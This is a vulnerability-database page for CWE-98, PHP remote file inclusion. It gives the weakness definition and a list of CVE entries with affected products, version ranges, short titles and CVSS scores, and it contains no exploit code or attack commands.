CWE-98

High likelihood

Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion')

Parent: CWE-706 - Use of Incorrectly-Resolved Name or Reference

The PHP application receives input from an upstream component, but it does not restrict or incorrectly restricts the input before its usage in "require," "include," or similar functions.

1,228 vulnerabilities with CWE-98
CVE-2023-25995 HIGH
choicehomemortgage AI Mortgage Calculator <1.0.1 - Code Injection
CVSS 7.5
CVE-2023-49031 MEDIUM
Tikit eMarketing <6.8.3.0 - Path Traversal
CVSS 5.1
CVE-2023-6989 CRITICAL
Shield Security < 18.5.10 - Unauthenticated Local File Inclusion via render_action_template Parameter
CVSS 9.8
CVE-2023-52325 HIGH
Trend Micro Apex Central - Authenticated Local File Inclusion
CVSS 7.5
CVE-2023-6583 MEDIUM
Import and export users and customers <= 1.24.2 - Path Traversal and Arbitrary File Read/Delete
CVSS 6.6
CVE-2023-49084 HIGH
Cacti RCE via SQLi in pollers.php
CVSS 8.0
CVE-2023-5815 HIGH
News & Blog Designer Pack < 3.4.1 - Unauthenticated Remote Code Execution via Local File Inclusion in bdp_get_more_post
CVSS 8.1
CVE-2023-5099 HIGH
WordPress <=2.7 - Local File Inclusion
CVSS 8.8
CVE-2023-5250 HIGH
Grid Plus <1.3.2 - Local File Inclusion
CVSS 8.8
CVE-2023-5199 CRITICAL
PHP to Page < 0.3 - Authenticated Local File Inclusion to Remote Code Execution via Shortcode
CVSS 9.9
CVE-2023-4488 CRITICAL
Dropbox Folder Share for WordPress <=1.9.7 - Local File Inclusion
CVSS 9.8
CVE-2023-31718 HIGH
FUXA <= 1.1.12 - Local File Inclusion via /api/download
CVSS 7.5
CVE-2023-31716 HIGH
FUXA <= 1.1.12 - Local File Inclusion
CVSS 7.5
CVE-2023-23565 MEDIUM
Geomatika IsiGeo Web 6.0 - Authenticated Local File Inclusion
CVSS 4.9
CVE-2023-3452 CRITICAL
Canto plugin for WordPress <=3.0.4 - RCE
CVSS 9.8
CVE-2023-4195 HIGH
Cockpit < 2.6.3 - PHP Remote File Inclusion
CVSS 8.8
CVE-2023-2249 HIGH
wpForo Forum < 2.1.7 - Authenticated Local File Include and Server-Side Request Forgery via file_get_contents
CVSS 8.8
CVE-2023-2551 HIGH
bumsys < 2.1.1 - Remote File Inclusion
CVSS 8.8
CVE-2023-24217 HIGH
AgileBio Electronic Lab Notebook <4.234 - Local File Inclusion
CVSS 8.8
CVE-2022-50954 MEDIUM
WordPress Plugin cab-fare-calculator 1.0.3 Local File Inclusion
CVSS 6.2
CVE-2022-50897 MEDIUM
mPDF 7.0 - Local File Inclusion via Annotation File Parameters
CVSS 5.5
CVE-2022-4982 HIGH
DBLTek GoIP-1 <GHSFVT-1.1-67-5 - Local File Inclusion
CVE-2022-4606 CRITICAL
GitHub flatpressblog/flatpress <1.3 - RCE
CVSS 9.8
CVE-2022-4446 CRITICAL
corebos < 8.0 - Remote File Inclusion
CVSS 9.8
CVE-2022-44786 HIGH
Appalti & Contratti 9.12.2 - Local File Inclusion via href Parameter
CVSS 7.5
Details
Vulnerabilities 1,228
Exploit Likelihood High
Links
MITRE CWE Entry Search this CWE With Exploits